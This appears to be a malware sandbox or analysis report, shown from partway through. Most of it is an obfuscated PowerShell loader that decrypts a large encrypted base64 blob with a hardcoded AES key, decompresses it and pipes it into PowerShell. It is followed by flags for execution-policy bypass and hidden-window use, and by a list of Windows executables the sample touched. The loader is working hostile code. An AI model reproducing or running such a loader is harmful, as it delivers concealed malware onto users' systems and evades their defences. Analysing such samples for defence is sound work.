JvvoAzF88w+Ybhz5prRR/BNqmFaUNEhJ3KY53Em5Uhk2dyPjCCTH1Oh3TeGg55ArY2lhgXyJNnM9PoAJhRZQ5VIsin5Ie4dXCDSG76mk0usbhheT3EV6vfxmGPEiWUzuS/xlLS87slZmjDUptCv20xfVisMQyVF7pYw/QDgUlLBdx1x1eTlSGapmqmXHaPWBOFeEjHWWv6KjE7EMfuizmJ/sxk2G1fJre1b8/ruq6jS62PR1kf50MpIMDS57WFiBpoCU9bAsjEs+S8o42Yn3FakwypIpmepYNZ8Gx9wbrtDreazE+ENDlAMIn0M1b7IUAu3ceVYF1J1kRKqsHPzuyMxkRryqzFYrJNbYrt5GQ7HBUgURx+N+9NcdaI+nYpsJRGa0RVEXBCC+GkY8l8FdeTWniE6+lae6eMGi3Nx3J8axMNWyUaOJSCQ4M7GC/kLCARNNIcgCxI1hdv+fxLPb9znvLmuUf+nTFh93BQnXAIj3/W5psGXmziMwutMKhkIHWHxFe8Wdh3o+WHnqQ2/J+MSKOrxqIrmSWcT7WR0WUgDoXse8PNAvGAcmYKNSuG9GtCmgbe/qAD9eCy0u8cn+VOYBfM3TOrpB5HHsmF+MDN3qC2FRETDgUQ+h4LQAgzA/HqF/yjd/u7NiZj9HdsOlhFxrlYCucRpsx0PAQ8E1AFPDxdLWaki8BJGLHEaCIO7Q82uthpaz73zTrbIinNzqIaVv/06tuvjf5wMT72e+ebc+Ie3LQks4EVUAqJMucMMb6wCrqf06Q5czWh8SPhK9I8BH0BeeNjH3iHr2pnFvbbk4ZgWPcAfsOFpLH792L8dwJWmbpCcMC3x/qsy/IZf3/tXVSco1fZJ0bunZV1g0jqmyolR1w+n19WET8ruQmose7Nhu9l7asYHY7i5EEOQik1D+1Zz8ayZt6M20Brr8FYQc3PEHO/WDxuduF+WsnAUUNke1c0/Sc5Z5Q0PACvwwxvA738cL3AfIDeB0+E7sOMlk8llo1Sq86TXqtjBskU2gxzvbAcoq4VLUldV1yaZ5RxE7s8PnuxlU/BrRQZjUoQXKVpVvA45zvP3U61F6S9yIxyyJ1dRgd6xA2/dS1IzNVEXN7xULbuhLDf0dsgljZFVHUEuyV73vy74nrUY/4Sqn+39WN/2mqpyTEFn/Kgcgs+JZWOQKJB/IfDOPi3C7iNfR+d4WXAgdnn55N+LoWH+tub+Ad9cHn4fqRoJ6JqFB9x74HViFsT8JDleAzd72SqqutK41lQ2Bl4i0vWwQEMGTf0/QpQHyi3Vx0lqkZ+1GRJDclaKlYkaSn6RRZJpGG3yzyBWO2T4b2Xj2gmhcyL7tlTEEBINASiXC+HwTXV8tNsTyLDXA3wsTC/feEs3C6msAsZfuPdnFT9rd8a+bMj44r0ybHsgREON/jTX8pfinacU7B6ku8gbVZEB9PwUMCqJ+iaj0ByMOlo7wlZkC9bKrlaWE2zrRwiE5zOOZnwCXHChEhwzueik13nwZlEHrwjhQQiaq36qGblU5aPgspHD0zjiaX7jcHt54iPiF2jT8D1g5WB5JQjU/9wSBrDvD4uzuEPMeQb5zDbq266ptjitL2YHDqCpdmvhaeTQZMJe2YG3/j';$XDMpCreVXQAD = 'b0trbUFVUE1PUkpvVVB5S0hHSVhXRkNpdHdxT2REbkg=';$bLWdYeFBFuhJS = New-Object 'System.Security.Cryptography.AesManaged';$bLWdYeFBFuhJS.Mode = [System.Security.Cryptography.CipherMode]::ECB;$bLWdYeFBFuhJS.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$bLWdYeFBFuhJS.BlockSize = 128;$bLWdYeFBFuhJS.KeySize = 256;$bLWdYeFBFuhJS.Key = [System.Convert]::FromBase64String($XDMpCreVXQAD);$WEAiH = [System.Convert]::FromBase64String($ITufmtMLHgVEL);$pyRnuLwCWDuo = $WEAiH[0..15];$bLWdYeFBFuhJS.IV = $pyRnuLwCWDuo;$hBIElkDucKiphjB = $bLWdYeFBFuhJS.CreateDecryptor();$PCFcWCWNsM = $hBIElkDucKiphjB.TransformFinalBlock($WEAiH, 16, $WEAiH.Length - 16);$bLWdYeFBFuhJS.Dispose();$xUKePqe = New-Object System.IO.MemoryStream( , $PCFcWCWNsM );$QcFLJ = New-Object System.IO.MemoryStream;$idFDAFHbprcw = New-Object System.IO.Compression.GzipStream $xUKePqe, ([IO.Compression.CompressionMode]::Decompress);$idFDAFHbprcw.CopyTo( $QcFLJ );$idFDAFHbprcw.Close();$xUKePqe.Close();[byte[]] $hzQbYlK = $QcFLJ.ToArray();$oPsDGyrbFbNs = [System.Text.Encoding]::UTF8.GetString($hzQbYlK);$oPsDGyrbFbNs | powershell -
option -executionpolicy unrestricted value Attempts to bypass execution policy
option -windowstyle hidden value Attempts to execute command with a hidden window
option -executionpolicy unrestricted value Attempts to bypass execution policy
option -windowstyle hidden value Attempts to execute command with a hidden window
file C:\Windows\System32\ie4uinit.exe
file C:\Program Files\Windows Sidebar\sidebar.exe
file C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file C:\Windows\System32\xpsrchvw.exe
file C:\Windows\System32\displayswitch.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file C:\Windows\System32\mblctr.exe
file C:\Windows\System32\mstsc.exe
file C:\Windows\System32\SnippingTool.exe
file C:\Windows\System32\SoundRecorder.exe
file C:\Windows\System32\dfrgui.exe
file C:\Windows\System32\msinfo32.exe
file C:\Windows\System32\rstrui.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file C:\Program Files\Windows Journal\Journal.exe
file C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file C:\Windows\System32\MdSched.exe
file C:\Windows\System32\msconfig.exe
file C:\Windows\System32\recdisc.exe
file C:\Windows\System32\msra.exe